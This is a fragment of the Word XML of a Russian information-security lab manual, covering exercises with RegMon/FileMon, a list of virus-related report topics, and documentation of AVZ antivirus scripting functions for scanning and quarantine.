          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>С помощью программы RegMon.exe отследить, к каким веткам р</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>естра обращается в процессе своей работы программа Сalc (ASPack 2.12).exe, с помощью программы FileMon.exe отследить, к каким файлам обращается в процессе своей работы программа Сalc (ASPack 2.12).exe.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="284"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Отчёт должен содержать описание функций и возможностей пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм RegMon и FileMon (без примеров), принскрины (таблицы или списки) всех обращений к файлам и реестру, сгруппированных по типу (чтение, запись и т.д.) и по объекту обращения (файл user.ini – чтение, запись, файл user.crt – открытие и т.д.).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="96"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="284"/>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Для защиты работы продемонстрировать работу программ RegMon и FileMon, объяснить процесс работы и результатов.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>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Pr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>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sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы в коммерческих программах.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы, реализующие корыстные интересы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы, открывающие доступ к компьютерным системам.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы, генерирующие файлы регистрации инфицированных пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>грамм.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="135"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Вирусы, изготавливающие фальшивые документы.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>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Default="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="90"/>
        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Принципы работы троянских коней.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Понятие макровируса. Инструментарий разработки макровируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Способы заражения макровирусами.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="00D70D0E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="156"/>
        </w:numPr>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>Обеспечение перманентности макровирусов. Методы сокрытия макровируса.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="144" w:name="_Toc503720810"/>
      <w:bookmarkStart w:id="145" w:name="_Toc3811341"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Практическая</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> работа </w:t>
      </w:r>
      <w:r>
        <w:t>21</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:t>. Скрипты управления программы AVZ</w:t>
      </w:r>
      <w:bookmarkEnd w:id="144"/>
      <w:bookmarkEnd w:id="145"/>
      <w:r w:rsidRPr="006E1E7E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Цель работы –</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> научиться практически, применять возможности подс</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>стемы программы AVZ для поиска и устранения последствий работы пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>грамм-вирусов.</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rPr>
        <w:t>Скрипт позволяет:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Модифицировать все настройки AVZ</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Запускать проверку и лечение заданных папок и дисков</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Сохранять протоколы (причем в протокол могут вноситься поясняющие данные)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Выполнять исследование системы</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Помещать в карантин файлы (указанных файлов или автокарантин)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Производить поиск классов с возможностью карантина связанных с н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ми файлов</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002C1237" w:rsidRPr="006E1E7E" w:rsidRDefault="002C1237" w:rsidP="002C1237">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:color w:val="000000"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>– Выполнять блокирование перехватчиков UserMode и KernelMode</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Sleep(AInterval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приостановку скрипта (и всего AVZ в целом) на указанный интервал времени. Интервал задается в секундах.</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ActivateWatchDog(Interval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Активирует сторожевой таймер. Параметр Interval содержит интервал времени в секундах. Сторожевой таймер позволяет ограничить время работы AVZ и принудительно завершить его работу в случае непредвиденной остано</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>в</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ки.</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SetupAVZ(S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w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>настройку</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> AVZ. </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">В качестве параметра указываются любой параметр командной строки (только один параметр).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RunScan;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Запуск сканирования. Выполнение скрипта продолжится после заверш</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ния сканирования. Настройки сканирования должны быть заданы до вызова RunScan.</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ExitAVZ;</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Завершение работы AVZ. Применяется в качестве последней команды в скриптах, рассчитанных на автоматическое выполнение</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GetSystemBootMode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код, соответствующий режиму, в котором загружена Windows.</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GetEnvironmentVariable(AName : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</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Запрашивает значение указанной переменной окружения.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GetComputerName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сетевое имя компьютера. Сетевое имя всегда возвращается в верхнем регистре для упрощения сравнения и анализа.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GetComputerComments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lastRenderedPageBreak/>
        <w:t>Возвращает текстовое описание компьютера, которое указывается в поле "Описание" в настройках имени компьютера. Данная функция полезна в корп</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ративной сети при условии заполнения описания компьютеров данными о его местоположении и ответственном за данный компьютер пользователе.</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IsNT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true, если установленная на компьютере версия Windows о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>т</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>носится к платформе NT (NT, W2K, XP, W2K3, Vista) и false для платформы W9x.</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IsWow64:boolean;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true, если процесс запущен под WOW64, и false во всех остальных случаях. </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GetComputerHash : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>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несмысловую строку, идентифицирующую данный ПК. С технической точки зрения данная строка является MD5 хешем от серийного номера тома системного диска и сетевого имени ПК.</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TranslateStr(AMsg : </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>):</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локализацию строки по текущей базе локализации AVZ. Коды локализованных выражений имеют вид $AVZxxxx – где xxxx – четырехзна</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ч</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ный код выражения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ShowMessage(AMsg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Процедура ShowMessage выводит текстовое сообщение AMsg на экран. Выполнение скрипта останавливается до тех пор, пока пользователь не нажмет кнопку "ОК" в окне с сообщением.</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InputBox(ACaption, APrompt, ADefault: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">):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Функция InputBox выводит на экран диалоговое окно с полем ввода. З</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>головок окна определяется параметром ACaption, приглашение для ввода да</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>н</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ных – APrompt. Значение ADefault вводится в строку в качестве значения по умолчанию. В окне имеется две кнопки – OK и Отмена. Работа скрипта ост</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>навливается до нажатия на кнопку "ОК" или "Отмена" в окне ввода. При наж</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">тии ОК функция возвращает значение, введенное пользователем. При нажатии кнопки "Отмена" возвращается значение по умолчанию, заданное параметром ADefault.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MessageDlg(Msg: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:rStyle w:val="fcodeexample"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; DlgType: TMsgDlgType; Buttons: TMsgDlgButtons; HelpCtx: Longint):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Данная функция отображает на экране стандартное диалоговое окно и возвращает код кнопки, нажатой пользователем в диалоговом окне. Примен</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>е</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ние данной функции позволяет создавать интерактивные скрипты.</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ExecuteAVUpdate : boolean;</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lastRenderedPageBreak/>
        <w:t>Выполнение обновления баз утилиты AVZ через Интернет. Параметры для функции не требуются, обновление производится с одного из серверов, с</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>о</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>держащих обновление. Сервер</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>выбирается</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>случайным</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF38D0">
        <w:rPr>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>образом</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ExecuteAVUpdateEx(AServerURL : string; AConnectMode : byte; ProxyServer, ProxyUser, ProxyPass : string)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Выполнение обновления баз утилиты AVZ через Интернет. Аналогична ExecuteAVUpdate, но проводит обновление согласно заданным параметрам с указанного URL, что в частности позволяет обновлять базы с сервера в локал</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ь</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">ной сети.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AddToLog(S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добавление в протокол указанной строки. Данная функция полезна для регистрации некоторой информации, которую разработчик скрипта желает внести в протокол.</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SaveLog(S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Сохранение протокола в файл. Файл может размещаться в сети. Если ук</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>а</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>занный в имени файла протокола путь не существует, то перед сохранением файла протокола делается попытка создания этой папки. Если по указанному пути уже существует файл с указанным именем, то он затирается сохраняемым протоколом без вывода запросов или предупреждений.</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ClearLog;</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очистку протокола.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SaveCSVLog(S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Сохраняет протокол в формате CSV. Протокол в формате CSV содержит три поля, разделенных символом ";" – имя файла, код события и текстовое пр</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>и</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>мечание.</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ExecuteAutoQuarantine;</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Выполнение автоматического карантина файлов, которые не опознаны по базе безопасных. В такой карантин попадают все загруженные проце</w:t>
      </w:r>
      <w:r w:rsidRPr="006E1E7E">
        <w:rPr>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>с</w:t>
      </w:r>
